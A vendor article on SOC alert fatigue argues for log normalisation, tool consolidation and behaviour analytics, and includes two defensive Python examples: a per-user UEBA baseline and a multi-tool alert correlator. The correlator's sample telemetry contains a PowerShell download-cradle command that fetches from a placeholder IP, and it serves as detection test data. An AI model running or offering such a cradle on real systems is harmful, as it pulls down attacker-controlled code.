Saving SOC analysts from alert fatigue

By David Atkinson, CEO, SenseOn

Why are 67% of SOC analysts contemplating a career change? The reason: alerts. Specifically, the overwhelming amount of time spent by SOC analysts to address security alerts and tickets that far surpasses their available resources. This phenomenon, commonly known as alert fatigue, is pervasive across managed and in-house SOCs alike, where an array of tools like SIEMs, NDRs, and EPPs gather logs from diverse environments and employ signatures and rules to identify potential threats.

Fortunately, addressing SOC alert fatigue is within reach. While some may enhance their remediation workflows, there are technological advancements that can benefit every SOC in how security alerts are generated, correlated and presented to analysts.

A problem that shouldn’t be ignored

In an average SOC, point solutions might generate thousands of alerts in a week – and maybe a handful will actually require immediate attention and action. For those responsible for checking each alert, this massive volume of false positive notifications isn’t easy or quick to work through.

Spending countless hours checking false positive alerts costs businesses money. It also leaves SOC teams drained and stressed, so they start looking for other jobs. In fact, a survey by SenseOn uncovered that 95% of security teams already struggle with retention due to staff stress.

This is a serious problem considering the ongoing cybersecurity talent shortage. SOC analysts also carry concerns over the potential of overlooking critical security incidents amid the barrage of repetitive or redundant alerts. If a malicious alert is mistakenly dismissed as just another false alarm, businesses run the risk of experiencing a catastrophic and costly data breach.

The gravity of the situation is underlined by the realisation that each false positive alert diminishes the ability to respond promptly and effectively to genuine threats. Alert fatigue can quickly erode trust in security operations across the entire organisation, as frequent interruptions for false alarms breed apathy among employees, undermining the seriousness with which security events are perceived.

Time to turn down the noise

Addressing alert fatigue necessitates a nuanced approach that balances the need for vigilance with the imperative to minimise noise. It is a complex challenge to reduce alert volume without overlooking genuine threats and risking hefty fines from regulatory bodies. However, adopting a multifaceted, strategic approach together with the implementation of advanced technological tools will help improve the accuracy of threat detection and reduce the burden on over-stretched SOC teams.

One important initiative to undertake is for SOC teams to normalise log data into a single format. Traditional SOCs draw data from a plethora of tools and platforms like EDRs, NDRs and IPS and IDS systems, resulting in disparate data points. By consolidating data into a unified format, SOCs can enhance data quality and enable holistic visibility into suspicious activities across the network.

The consolidation of point products into a single solution also plays a pivotal role in SOC resilience and efficacy. Beyond operational benefits, such as time and cost savings, a unified security infrastructure promotes organisational stability and confidence. It mitigates the risk of gaps in defence coverage and simplifies the response to potential threats, thereby bolstering overall cyber defence posture. By reducing the number of disparate tools, SOCs can minimise the need for extensive training and upkeep, allowing them to focus more on proactive threat hunting and less on managing tool sprawl.

Moreover, modelling typical user and device behaviour is imperative for alleviating alert fatigue and speeding up the time it takes to investigate threats. Instead of solely relying on rule-based alerts, the integration of User and Entity Behaviour Analytics (UEBA) enables SOCs to establish baseline behaviour patterns and flag deviations indicative of potential threats. Continuously adapting to organisational environment changes enhances threat detection accuracy while minimising false alarms.
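To make the UEBA idea concrete, here is an added example (not SenseOn's code or any product's algorithm) of a per-user baseline that learns typical outbound data volume and logon hours, scores new observations against it, and folds analyst-confirmed benign observations back in so the baseline adapts. The training history, the user names and the thresholds are constructed assumptions; the online mean/variance uses Welford's algorithm so no raw history needs to be stored.

```python
import math
from dataclasses import dataclass, field


@dataclass
class Baseline:
    """Per-entity baseline: running mean/variance of a numeric feature
    (outbound MB per day) plus the set of hours the entity is normally active."""
    n: int = 0
    mean: float = 0.0
    m2: float = 0.0
    seen_hours: set = field(default_factory=set)

    def update(self, value, hour):
        # Welford's online algorithm: stable variance without keeping history.
        self.n += 1
        delta = value - self.mean
        self.mean += delta / self.n
        self.m2 += delta * (value - self.mean)
        self.seen_hours.add(hour)

    @property
    def std(self):
        return math.sqrt(self.m2 / (self.n - 1)) if self.n > 1 else 0.0


class Ueba:
    def __init__(self, z_threshold=3.0, min_samples=5):
        self.z_threshold = z_threshold    # assumed: flag beyond 3 standard deviations
        self.min_samples = min_samples    # assumed: do not alert on an immature baseline
        self.baselines = {}

    def observe(self, entity, mb_out, hour):
        self.baselines.setdefault(entity, Baseline()).update(mb_out, hour)

    def score(self, entity, mb_out, hour):
        b = self.baselines.get(entity)
        if b is None or b.n < self.min_samples:
            # Too little history: stay silent rather than generate noise.
            return {"entity": entity, "status": "learning", "anomalous": False,
                    "z": None, "new_hour": None, "reasons": []}
        if b.std > 0:
            z = (mb_out - b.mean) / b.std
        else:
            z = 0.0 if mb_out == b.mean else float("inf")
        new_hour = hour not in b.seen_hours
        reasons = []
        if abs(z) > self.z_threshold:
            reasons.append(f"outbound volume {mb_out} MB is {z:.1f} sd from baseline {b.mean:.1f} MB")
        if new_hour:
            reasons.append(f"activity at hour {hour:02d} never seen for this entity")
        return {"entity": entity, "status": "scored", "anomalous": bool(reasons),
                "z": z, "new_hour": new_hour, "reasons": reasons}

    def confirm_benign(self, entity, mb_out, hour):
        """An analyst adjudicated the observation as normal: fold it into the
        baseline so the model adapts instead of re-alerting on the same pattern."""
        self.observe(entity, mb_out, hour)


# Constructed training history: (outbound MB that day, logon hour). Not real data.
HISTORY = {
    "alice": [(42, 9), (47, 9), (51, 10), (39, 8), (55, 11),
              (48, 9), (44, 10), (52, 9), (46, 8), (50, 10)],
    "bob": [(20, 9), (25, 10)],   # deliberately too few samples
}


def build_model(history=HISTORY):
    model = Ueba()
    for entity, samples in history.items():
        for mb_out, hour in samples:
            model.observe(entity, mb_out, hour)
    return model


if __name__ == "__main__":
    m = build_model()
    for obs in [("alice", 55, 10), ("alice", 900, 3), ("bob", 300, 2)]:
        print(m.score(*obs))
```

A normal day for alice scores within the threshold and stays silent; a large transfer at 03:00 trips both the volume and the never-seen-hour checks and carries the reasons an analyst needs, while bob produces nothing until his baseline has enough samples to be trusted.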

Finally, organisations stand to gain from automating data correlation and MITRE ATT&CK mapping to augment SOC efficiency. Advanced correlation capabilities automatically scrutinise security observations and contextualise them with data from various sources to pinpoint genuine threats. This approach streamlines the investigation process, empowering SOC analysts to prioritise and respond to incidents more effectively.
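The two steps described above, normalising disparate tool output into one format and then correlating it across sources with MITRE ATT&CK context, can be shown end to end in an added example (not SenseOn's code or any product's implementation). The three log layouts, the asset inventory, the rule SID and the category-to-technique mapping are all constructed assumptions; the technique IDs themselves (T1059.001, T1071, T1105) are real ATT&CK identifiers chosen to fit the constructed events. Four raw alerts from three tools collapse into a single correlated alert, and an event that only one tool saw is held back rather than surfaced.

```python
import json
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample telemetry in three vendor-style layouts (assumed, not real tool output).
RAW_LINES = [
    ("edr", '2024-05-01T10:00:05Z host=ws-17 user=alice proc=powershell.exe '
            'cmd="powershell -c (New-Object Net.WebClient).DownloadString(\'http://203.0.113.5/x\')"'),
    ("ids", "05/01/2024-10:00:09.123 [**] [1:1000001:1] LOCAL Possible PowerShell download [**] "
            "10.1.2.17:51234 -> 203.0.113.5:443"),
    ("ndr", '{"ts": 1714557612, "src_ip": "10.1.2.17", "dst_ip": "203.0.113.5", '
            '"dst_port": 443, "alert": "beacon-like periodicity"}'),
    ("ndr", '{"ts": 1714557900, "src_ip": "10.1.2.30", "dst_ip": "198.51.100.9", '
            '"dst_port": 443, "alert": "beacon-like periodicity"}'),
]
# Assumed asset inventory used to resolve IPs to hostnames (constructed).
ASSETS = {"10.1.2.17": "ws-17", "10.1.2.30": "ws-30"}
# Illustrative mapping from normalised category to ATT&CK technique IDs.
TECHNIQUES = {"download_cradle": ["T1059.001", "T1105"], "beaconing": ["T1071"]}

EDR_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) proc=(?P<proc>\S+) cmd="(?P<cmd>.*)"$')
IDS_RE = re.compile(r'^(?P<ts>\S+) \[\*\*\] \[(?P<sid>[\d:]+)\] (?P<msg>.*?) \[\*\*\] '
                    r'(?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):\d+$')


def normalise(source, line):
    """Turn one vendor-specific line into the unified schema:
    ts (UTC datetime), source, host, user, category, detail."""
    if source == "edr":
        m = EDR_RE.match(line)
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        cat = "download_cradle" if "downloadstring" in m["cmd"].lower() else "process"
        return {"ts": ts, "source": source, "host": m["host"], "user": m["user"],
                "category": cat, "detail": m["cmd"]}
    if source == "ids":
        m = IDS_RE.match(line)
        ts = datetime.strptime(m["ts"], "%m/%d/%Y-%H:%M:%S.%f").replace(tzinfo=timezone.utc)
        cat = "download_cradle" if "download" in m["msg"].lower() else "signature"
        return {"ts": ts, "source": source, "host": ASSETS.get(m["src"], m["src"]), "user": None,
                "category": cat, "detail": m["msg"]}
    if source == "ndr":
        d = json.loads(line)
        ts = datetime.fromtimestamp(d["ts"], tz=timezone.utc)
        cat = "beaconing" if "beacon" in d["alert"] else "flow"
        return {"ts": ts, "source": source, "host": ASSETS.get(d["src_ip"], d["src_ip"]), "user": None,
                "category": cat, "detail": d["alert"]}
    raise ValueError(f"unknown source {source}")


def correlate(events, window_s=60, min_sources=2):
    """Bucket events per host within a time window and emit one alert only when
    at least min_sources independent tools agree, tagged with the union of techniques."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host[ev["host"]].append(ev)
    alerts = []
    for host, evs in by_host.items():
        bucket = []
        for ev in evs + [None]:  # the None sentinel flushes the final bucket
            if ev is not None and (not bucket or (ev["ts"] - bucket[0]["ts"]).total_seconds() <= window_s):
                bucket.append(ev)
                continue
            sources = sorted({e["source"] for e in bucket})
            if len(sources) >= min_sources:
                techniques = sorted({t for e in bucket for t in TECHNIQUES.get(e["category"], [])})
                alerts.append({"host": host, "sources": sources, "techniques": techniques,
                               "events": len(bucket), "first_seen": bucket[0]["ts"].isoformat()})
            bucket = [ev] if ev is not None else []
    return alerts


def run(raw=RAW_LINES):
    """Normalise every raw line, then correlate; returns (raw alert count, correlated alerts)."""
    events = [normalise(src, line) for src, line in raw]
    return len(events), correlate(events)


if __name__ == "__main__":
    raw_count, alerts = run()
    print(f"{raw_count} raw alerts -> {len(alerts)} correlated alert(s)")
    for a in alerts:
        print(a)
```

The analyst sees one ticket for ws-17 that already names the three tools that observed it and the ATT&CK techniques involved, instead of three separate alerts to reconcile by hand; the lone NDR observation on ws-30 is retained as an event but does not become a ticket on its own.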

Charting a less noisy path forward

New research conducted by SenseOn has revealed that 83% of SOC teams express a keen interest in adopting AI-powered tools to automate security operations. This investment in AI holds significant promise, particularly for individual SOC analysts grappling with the strain of ongoing staff shortages and the inundation of daily alerts. Moreover, 53% of cybersecurity professionals express a desire for tools capable of curbing the alert volume.

However, security teams don’t want best-of-breed tools if they don’t integrate with the rest of their environment. A bigger security tool ecosystem creates more risks, as SOCs simply don’t have capacity to effectively operate layers of defensive technology. That’s why the consolidation of point products and having a single view of data is important. Organisations can be safer when the threat detection and response systems covering different parts of their environment talk to one another, collect data in a unified format, and ultimately distinguish genuine threats from background noise to diminish the occurrence of false positives.

The outcome of bolstering threat detection and response capabilities through solution consolidation and AI integration translates into tangible cost savings for organisations. By streamlining operations and mitigating the incidence of false positives, businesses can optimise resource allocation and enhance the efficiency of their security operations. Any company that puts in place a unified security stack will benefit from savings in analyst costs and a reduction in SIEM expenses, will have fewer blind spots, and will be able to confront burgeoning cybersecurity challenges with less stress and more confidence.
